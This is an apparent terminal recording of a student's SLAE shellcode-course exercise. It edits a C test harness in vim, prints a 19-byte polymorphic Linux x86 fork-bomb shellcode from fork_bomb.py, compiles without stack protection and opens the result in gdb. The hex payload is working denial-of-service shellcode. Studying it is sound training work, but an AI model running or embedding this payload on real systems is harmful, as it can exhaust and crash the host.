[17.640009, "o", "rlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m\"shellcode.c\" 18L, 319C                             d         9,76-90       All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;10H\u001b[?12l\u001b[?25h"]
[17.728251, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x5a\\x29\\xc0\\xb0\\x15\\x2c\\x13\\x59\\x6a\\x39\\xb0\\x02\\xcd\\x80\\xeb\\xf0\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, st"]
[17.728561, "o", "rlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m\"shellcode.c\" 18L, 319C                             d         9,76-90       All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;10H\u001b[?12l\u001b[?25h"]
[17.751306, "o", "\u001b[23;54Hd\b\b  \u001b[9;22r\u001b[9;1H\u001b[2M\u001b[21;1H\u001b[94m~                                                                               \u001b[22;1H~                                                                               \u001b[39m\u001b[23;1H\u001b[K\u001b[62C9,9-23\u001b[8CAll\u001b[1;24r\u001b[9;23H"]
[17.776104, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n"]
[17.776402, "o", "\u001b[94m~                                                                               \u001b[19;1H~                                                                               \u001b[20;1H~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m                                                              9,9-23        All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;23H\u001b[?12l\u001b[?25h"]
[17.837444, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n"]
[17.83873, "o", "\u001b[94m~                                                                               \u001b[19;1H~                                                                               \u001b[20;1H~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m                                                              9,9-23        All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;23H\u001b[?12l\u001b[?25h"]
[18.029994, "o", "\u001b[23;53HO\b \r\u001b[1m-- INSERT --\u001b(B\u001b[m\u001b[50C\u001b[K9,10-24\u001b[7CTop\u001b[9;22r\u001b[9;1H\u001b[1L\u001b[23;63H\u001b[K9,10-24\u001b[7CAll\u001b[1;24r\u001b[9;24H"]
[18.172761, "o", "\u001b[31m\"\u001b[23;66H\u001b[39m1-25\u001b[9;25H"]
[18.862873, "o", "\u001b[10;22r\u001b[10;1H\u001b[1L\u001b[9;25H\u001b[35m\\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb00\r\\x02\\xcd\\x80\\xeb\\xed\r\n\u001b[31m                       \u001b[1;24r\u001b[11;24H\u001b[?25l\u001b(B\u001b[m"]
[18.863508, "o", "\u001b[23;63H\u001b[K9,87-101      All\u001b[10;21H\u001b[?12l\u001b[?25h"]
[19.310251, "o", "\u001b[31m\"\r\n\u001b[39m                       \u001b[23;66H8-102\u001b[10;22H"]
[19.830942, "o", ";\u001b[23;66H9-103\u001b[10;23H"]
[20.076915, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[3"]
[20.077205, "o", "1m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m\u001b[1m-- INSERT --\u001b(B\u001b[m                                                  9,89-103      All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;23H\u001b[?12l\u001b[?25h"]
[20.136983, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[3"]
[20.137491, "o", "1m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m\u001b[1m-- INSERT --\u001b(B\u001b[m                                                  9,89-103      All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;23H\u001b[?12l\u001b[?25h"]
[20.217164, "o", "\u001b[23;1H\u001b[K\u001b[52C^[\u001b[10;22H\u001b[?25l"]
[20.317934, "o", "\u001b[23;53H  \u001b[8C9,88-102      All\u001b[10;22H\u001b[?12l\u001b[?25h"]
[20.36414, "o", "\u001b[23;53H:\b\u001b[K\r:"]
[20.54972, "o", "w"]
[20.638039, "o", "q"]
[20.740452, "o", "\r"]
[20.742212, "o", "\"shellcode.c\"\u001b[?25l"]
[20.749105, "o", " 18L, 331C written"]
[20.753347, "o", "\r"]
[20.753588, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[20.753792, "o", "\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[8d\u001b[?12l\u001b[?25h"]
[20.759548, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[8;1H \r"]
[20.76075, "o", "\u001b[1;23r\u001b[9;23r\u001b[15S\u001b[8;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[8;60H\u001b(B\u001b[m"]
[20.76093, "o", "\r\n"]
[20.761093, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[20.761257, "o", "\u001b[K"]
[20.761584, "o", "\u001b[?2004h"]
[21.163156, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;4H\u001b[?12"]
[21.163449, "o", "l\u001b[?25h"]
[21.16364, "o", "."]
[21.264866, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b["]
[21.26517, "o", "m.\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;5H\u001b[?12l\u001b[?25h"]
[21.309376, "o", "\b.."]
[21.362613, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b["]
[21.36436, "o", "m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;6H\u001b[?12l\u001b[?25h"]
[21.557469, "o", "/"]
[21.789247, "o", "."]
[21.940578, "o", "."]
[22.156177, "o", "/"]
[22.492126, "o", "b"]
[22.724311, "o", "i"]
[22.808832, "o", "n\u001b[1m/\u001b(B\u001b[m"]
[23.04507, "o", "\b/s"]
[23.14058, "o", "h"]
[23.375006, "o", "\b\b.sh\u001b[3D"]
[23.65226, "o", "\u001b[C.sh\u001b[3D"]
[24.406613, "o", "sh \u001b[4D"]
[24.509343, "o", "c.sh\u001b[3D"]
[24.660434, "o", "o.sh\u001b[3D"]
[24.865068, "o", "mpile.sh\u001b[1m \u001b(B\u001b[m"]
[25.340281, "o", "\b \b"]
[25.958504, "o", " "]
[26.132401, "o", "s"]
[26.245375, "o", "h"]
[26.42718, "o", "ellcode"]
[26.90016, "o", "."]
[27.036476, "o", "c"]
[27.252939, "o", "\r\n\u001b[?2004l"]
[27.26211, "o", "[*] Compiling shellcode"]
[27.26238, "o", "\r\n"]
[27.262745, "o", "[+] Calling gcc without stack protection"]
[27.262975, "o", "\r\n"]
[27.337634, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[12;1H \r"]
[27.338995, "o", "\u001b[1;23r\u001b[13;23r\u001b[11S\u001b[12;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[12;60H\u001b(B\u001b[m"]
[27.339195, "o", "\r\n"]
[27.339357, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[27.339514, "o", "\u001b[K"]
[27.339789, "o", "\u001b[?2004h"]
[28.164671, "o", "g"]
[28.228332, "o", "\bgd"]
[28.38852, "o", "b"]
[28.516949, "o", " "]
[28.644269, "o", "s"]
[28.740295, "o", "h"]
[28.950986, "o", "ellcode"]
[29.614762, "o", "\r\n\u001b[?2004l"]
[29.715175, "o", "Reading symbols from shellcode...\u001b]0;SLAE ❐ SLAE ● 1 gdb\u0007\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;"]
[29.719244, "o", "5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[14;34H\u001b[?12l\u001b[?25h"]
[29.71952, "o", "(no debugging symbols found)...done.\r\n"]
[29.74116, "o", "(gdb) "]
[29.809518, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b["]
[29.809901, "o", "m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;7H\u001b[?12l\u001b[?25h"]
[29.925261, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b["]
